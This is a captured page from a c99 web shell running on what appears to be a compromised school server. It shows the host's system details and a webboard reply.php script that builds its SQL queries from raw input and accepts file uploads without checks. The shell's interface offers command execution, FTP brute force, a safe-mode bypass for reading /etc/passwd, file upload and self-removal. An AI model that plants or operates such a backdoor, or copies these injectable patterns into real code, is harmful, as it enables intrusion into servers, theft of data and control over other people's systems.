!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 52.66 GB of 127.8 GB (41.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     reply.php (8.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include("../include/FunctionDB.php");
	include("../config.inc.php");
	include("../function.php"); 
	 ConnectDB();
		if(getenv(HTTP_X_FORWARDED_FOR)) 
	{
		$IP = getenv(HTTP_X_FORWARDED_FOR);
	}	 
else 
	{
		$IP = getenv("REMOTE_ADDR");
	}
	$Member = 0;

	// ป้องกันการแทรก html กับ ละเครื่องหมาย ' "
	$MsgBy = htmlspecialchars($MsgBy);
	$Email = htmlspecialchars($Email);
	$Msg = htmlspecialchars($Msg);


	// ป้องกันคำหยาบ
	$word = array("ashole","a s h o l e","a.s.h.o.l.e","bitch","b i t c h","b.i.t.c.h","shit","s h i t","s.h.i.t","fuck","dick","f u c k","d i c k","f.u.c.k","d.i.c.k","มึง","มึ ง","กู","ควย","ค ว ย","ค.ว.ย","ปี้","เหี้ย","เฮี้ย","ชาติหมา","ชาดหมา","ช า ด ห ม า","ช.า.ด.ห.ม.า","ช า ติ ห ม า","ช.า.ติ.ห.ม.า","ไอ้","สัดหมา","สัด","เย็ด","หี");
	$ban = "<font color=red>***</font>";
	for ($i=0 ; $i<sizeof($word) ; $i++) {
		$MsgBy = eregi_replace($word[$i],$ban,$MsgBy);
		$Email = eregi_replace($word[$i],$ban,$Email);
		$Msg = eregi_replace($word[$i],$ban,$Msg);
	}

	// ตรวจสอบการแทรกรูปภาพ
	$txt = array(":smile:", ":sad:",":red:", ":big:", ":ent:", ":shy:", ":sleepy:", ":sun:", ":sg:", ":embarass:", ":dead:", ":cool:", ":clown:", ":pukey:", ":eek:", ":roll:", ":smoke:", ":angry:", ":confused:", ":cry:", ":lol:", ":yawn:", ":devil:", ":tongue:", ":alien:", ":tasty:", ":crazy:",":h:",":true:",":false:");
	$pic = array("smile.gif","frown.gif","redface.gif","biggrin.gif","blue.gif","shy.gif","sleepy.gif","sunglasses.gif","supergrin.gif","embarass.gif","dead.gif","cool.gif","clown.gif","pukey.gif","eek.gif","sarcblink.gif","smokin.gif","reallymad.gif","confused.gif","crying.gif","lol.gif","yawn.gif","devil.gif","tongue.gif","aysmile.gif","tasty.gif","grazy.gif","h.gif" ,"true.gif","false.gif");
	for ($a=0 ; $a<sizeof($txt) ; $a++) {
		$Msg = eregi_replace($txt[$a],"<img src=\"pic/$pic[$a]\">",$Msg);
	}

    // ตรวจสอบว่า มีการป้อน url หรือ email มาหรือไม่ ถ้ามีให้ทำ link
	
//$Msg = stripslashes(htmlspecialchars($Msg));
		//$Msg = eregi_replace ( "<" , "&lt;" , $Msg ) ;
		//$Msg = eregi_replace ( ">" , "&gt;" , $Msg ) ;
		//$Msg = eregi_replace ( "\n", "<br>" , $Msg ) ;

		//สำหรับเปลี่ยนอักขระที่กำหนด ให้เป็นแทก html ต่างๆ
	
		$Msg = eregi_replace ( "\[b\]", "<b> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/b\]", " </b>" , $Msg ) ;
		$Msg = eregi_replace ( "\[i\]", "<i> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/i\]", " </i>" , $Msg ) ;
		$Msg = eregi_replace ( "\[u\]", "<u> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/u\]", " </u>" , $Msg ) ;
$Msg = eregi_replace ( "\[sup\]", "<sup> " , $Msg ) ;
$Msg = eregi_replace ( "\[/sup\]", " </sup>" , $Msg ) ;
$Msg = eregi_replace ( "\[sub\]", "<sub> " , $Msg ) ;
$Msg = eregi_replace ( "\[/sub\]", " </sub>" , $Msg ) ;
$Msg = eregi_replace ( "\[glow\]"," <table style=\"filter:glow(color=pink, strength=3)\"> ", $Msg ) ;
$Msg = eregi_replace ( "\[/glow\]", " </table>" , $Msg ) ;

$Msg = eregi_replace ( "\[shadow\]"," <table style=\"filter:shadow(color=pink, direction=left)\"> ", $Msg ) ;
$Msg = eregi_replace ( "\[/shadow\]", " </table>" , $Msg ) ;

		$Msg = eregi_replace ( "\[\-\-\-\]", "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" , $Msg ) ;
		$Msg = eregi_replace ( "\[color=red\]", "<font color=red> " , $Msg ) ;
		$Msg = eregi_replace ( "\[color=green\]", "<font color=green> " , $Msg ) ;
		$Msg = eregi_replace ( "\[color=blue\]", "<font color=blue> " , $Msg ) ;
		$Msg = eregi_replace ( "\[color=orange\]", "<font color=FF6600> " , $Msg ) ;
		$Msg = eregi_replace ( "\[color=pink\]", "<font color=FF00FF> " , $Msg) ;
		$Msg = eregi_replace ( "\[color=gray\]", "<font color=999999> " , $Msg ) ;
		$Msg = eregi_replace ( "\[/color\]", " </font>" , $Msg ) ;
	$Msg = eregi_replace ("\[img\]([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]])\[/img\]", "<img src=\"\\1://\\2\\3\">",$Msg ) ;
	
	// ให้ขึ้นบันทัดใหม่ กรณีที่มีการเคาะ Enter
	$Msg = eregi_replace(chr(13)," <br> ",$Msg );
$Msg = eregi_replace("(^|[>[:space:]\n])([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])([<[:space:]\n]|$)","<a href=\"\\2://\\3\\4\" target=\"_blank\">\\2://\\3\\4</a>", $Msg );

	$Msg = eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])([<[:space:]\n]|$)","<a href=mailto:\\1@\\2\\3\>\\1@\\2\\3</a>", $Msg ); 
	 ตรวจสอบว่าเป็นสมาชิกหรือไม่ 
//mysql_connect($host,$user,$passwd);
//mysql_query("SET NAMES 'tis620'");
/	$sql = "select Teacher_code from personal_tb WHERE Teacher_code='$Teacher_code ' "; 
	$result = mysql_db_query($dbname,$sql);
$NRow = mysql_num_rows($result);
$row = mysql_fetch_array($result);

	// ตรวจสอบว่า Password ถูกหรือไม่	
//	if($MsgBy==$row["User"] && $QPass==$row["Password"]) { 
//		$Member = 1;
	//	if(!$Email) {
	//		$Email = $row["Email"];
	//	}
//	}

	// บันทึกรูปภาพ
	

	if(($Msg =='')&&($QName==''))
{   echo "<table background=\"img/bg2.gif\" border=\"1\">";
	echo "<td>";
	echo "<center >";
	echo "ข้อความส่งมาไม่สมบูรณ์อาจใส่ข้อมูลไม่ครบ หรือตกหล่นระหว่างการส่งข้อมูล กรุณาส่งข้อความอีกครั้ง<br>";
	echo "<a href='javascript:history.back(1)'>[ กลับไปแก้ไข ] </a>";
	echo "</center>";
	echo "</td >";
	echo "</table>";
		exit();
	}

	if($Teacher_code)

		{
			if( $QPic !='')
	          { 
	
            $Pic_name = substr ($QPic_name, -4);
			srand((double)microtime()*1000000); 
			$QPic_name=$random_pic = rand(1,9999);
	

#แปลงนามสกุล และทำการ upload
if ( $QPic_type == "image/png" )
		{
			$filename = $QPic_name.".png";
		}

if ( $QPic_type == "image/gif" )
		{
			$filename = $QPic_name.".gif";
		}
if ( $QPic_type == "image/bmp" )
		{
			$filename = $QPic_name.".bmp";
		}
		if( $Pic_name == ".swf" )
		{
			$filename  =strtolower($QPic_name.'.swf');			
		}
elseif(($QPic_type=="image/jpg")||($QPic_type=="image/jpeg")||($QPic_type=="image/pjpeg"))	
        {
			$filename =strtolower($QPic_name.'.jpg');
		}

if($QPic_size>$Image_size) {
				echo "ขนาดของภาพเกิน $Image_size bytes [$Image_msg]<br>";
				exit();
			}
			copy ($QPic , "$path/" . $filename );
		
	         }
	
	     }
			else
			{
			echo 
			"<table width=60% border=1 bordercolor=\"#ff69b4\" bgcolor=\"#f0ffff\" cellpadding=\"2|' cellspacing=\"0\" align=\"center\">
	<tr align=\"center\"><td align=\"center\"><font color=\"red\" size=\"3\">ต้องเป็นสมาชิกครับถึงจะ post รูปได้</font>
		</td></tr></table><br>";
		
			}

			
	// ปรับเวลาให้ตรงกับเวลาเมืองไทย กรณีที่ server อยู่ที่เมืองนอก
	//$mdate = date("Y-m-d H:i:s");	
	 setlocale (LC_TIME, $locale);
	$mdate= strftime("%Y-%m-%d %H:%M:%S");
	//$mdate= strftime("%Y-%m-%d %X");


//echo "$mdate ";
// ตรวจสอบว่าเป็นสมาชิกหรือไม่ 
	mysql_connect($host,$user,$passwd);
	mysql_query("SET NAMES 'tis620'");
	$sqlr = "select User,Password,Email from webboard_member where User='$MsgBy'";
	$resultr = mysql_db_query($dbname,$sqlr);
	$NRowr = mysql_num_rows($resultr);
	$rowr = mysql_fetch_array($resultr);

	// ตรวจสอบว่า Password ถูกหรือไม่	
	if($MsgBy==$rowr["User"] && $QPass==$rowr["Password"]) 
	{ 
		$Memberr = 1;
		if(!$QEmail) 
			{
			$QEmail = $rowr["Email"];
		    }
	}else
	 {
	$Memberr = 0;
	 }


	// บันทึกข้อมูลลง database
	$sql1 = "INSERT INTO webboard_ans (QuestionNo, Name,Namer, Member, IP, Email, Msg, Date,nphoto) VALUES ('$No','$MsgBy', '$MsgBy', '$Member', '$IP', '$Email', '$Msg', '$mdate','$filename')";
	$sql2 = "UPDATE webboard_data SET Reply=Reply+1, ReplyDate='$mdate',Namer='$MsgBy',Memberr='$Memberr' WHERE No='$No'";


//$sql3 = "insert into webboard_data (Memberr) values ('$Memberr')";
mysql_query("update webboard_ans set Namer='$MsgBy' where No='$No'");
//mysql_query("update webboard_data set Namer='$Namer' where No='$No'");

	$result1 = mysql_db_query($dbname,$sql1);
	$result2 = mysql_db_query($dbname,$sql2);

	if(!$result1) { echo "Error : Can not save to database"; exit(); } 
	if(!$result2) { echo "Error : Can not update to database"; exit(); } 

	$ShowNo = sprintf("%05d",$No);


	mysql_close();
?>

	<html>
	<head>
	<title><?echo $title?></title>
	<meta name="Generator" content="EditPlus">
	<META HTTP-EQUIV="Content-Type" content="text/html; charset=windows-874">
	<META HTTP-EQUIV="REFRESH" CONTENT="2; URL=show.php?Teacher_code=<? echo $Teacher_code; ?>&No=<? echo $No; ?>"> 
	</head>

	<link href="./style.css" rel="stylesheet" type="text/css">

	<body background="pic/bg2.gif">
	<center>
	<table width=60% border=1 bordercolor=#ff69b4 bgcolor=#f0ffff cellpadding=2 cellspacing=0>
	<tr><td align=center>
	<font size=2 face='MS Sans Serif'>
	<font size=3 color=red><b>ได้รับข้อมูลแล้วครับ</b></font><br><br>
	หากคำตอบของคุณไม่ขึ้นให้กดปุ่ม Refresh/Reload ครับ
	</font></td></tr></table>
	<br><hr width=500 color=blue><font size=2 face='MS Sans Serif'>
	เราจะพาคุณกลับไปสู่ <font color=red><b>Webboard</b></font> คำถามที่ 
	<font color=blue><b><? echo $ShowNo; ?></b></font> โดยไม่ต้องกดปุ่มใดๆ 
	</font>
	</center>
	</body>
	</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--